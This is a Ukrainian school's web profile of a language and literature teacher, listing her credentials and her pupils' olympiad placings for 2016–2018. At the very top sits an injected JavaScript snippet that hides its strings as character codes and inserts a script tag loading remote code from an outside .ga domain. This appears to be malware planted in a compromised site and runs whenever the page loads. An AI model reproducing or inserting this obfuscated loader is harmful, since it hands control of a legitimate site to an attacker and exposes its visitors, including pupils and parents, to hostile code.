Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

КАФЕДРА ГУМАНІТАРНИХ ДИСЦИПЛІН

Вчитель української мови та літератури
Місце роботи:

Навчально-виховний комплекс “Якимівська гімназія” Якимівської районної ради Запорізької області

Стаж роботи

24 роки

Звання

старший учитель

Категорія

вища

Лісова Олена Леонідівна

  • Вчитель української мови та літератури
  • Класний керівник 10-Б класу

Кафедра

гуманітарних дисциплін

Проблемна тема

Формування духовності учнів у навчальному процесі

Педагогічне кредо

«Довго сам учись, якщо хочеш навчати інших»

Кількість переможців

2017-2018 н.р.

  • Федорова Поліна (учениця 8-Б класу)
    Олімпіада: ІІ (районний) етап Всеукраїнської учнівської олімпіади з української мови та літератури
    Місце: І
  • Костандова Анастасія (учениця 10-А класу)
    Олімпіада: ІІ (районний) етап Всеукраїнської учнівської олімпіади з української мови та літератури
    Місце: ІІ
  • Яковлєва Поліна (учениця 8-Б класу)
    Олімпіада: ІІ (районний) етап Всеукраїнської учнівської олімпіади з української мови та літератури
    Місце: ІІ
  • Мельник Аліна (учениця 10-Б класу)
    Олімпіада: ІІ (районний) етап Всеукраїнської учнівської олімпіади з української мови та літератури
    Місце: ІІІ
  • Костандова Анастасія (учениця 10-А класу)
    Олімпіада: ІІ (районний) етап Міжнародного мовно-літературного конкурсу ім. Т.Шевченка
    Місце: І

2016-2017 н.р.

  • Мельник Аліна (учениця 9-Б класу)
    Олімпіада: ІІ (районний) етап Всеукраїнської учнівської олімпіади з української мови та літератури
    Місце: І
  • Федорова Поліна (учениця 7-Б класу)
    Олімпіада: ІІ (районний) етап Всеукраїнської учнівської олімпіади з української мови та літератури
    Місце: І
  • Яковлєва Поліна (учениця 7-Б класу)
    Олімпіада: ІІ (районний) етап Всеукраїнської учнівської олімпіади з української мови та літератури
    Місце: ІІ
  • Возненко Вікторія (учениця 9-Б класу)
    Конкурс: районний фестиваль ораторського мистецтва “Заговори, щоб я тебе побачив”
    Місце: ІІ
  • Возненко Вікторія (учениця 9-Б класу)
    Конкурс: Міжрегіональний фестиваль ораторського мистецтва “Заговори, щоб я тебе побачив”
    Місце: ІІІ
  • Мельник Аліна (учениця 9-Б класу)
    Конкурс: ІІ (районний) етап Міжнародного мовно-літературного конкурсу ім. Т.Шевченка
    Місце: ІІ
  • Федорова Поліна (учениця 7-Б класу)
    Конкурс: ІІ (районний) етап Міжнародного конкурсу з української мови імені Петра Яцика
    Місце: ІІІ

Сертифікати та нагороди

  • Сертифікат Intel «Навчання для майбутнього»
  • Сертифікат Основи ІКТ за програмою «Партнерство у навчанні»

Педагогічний колектив НВК "Якимівська гімназія"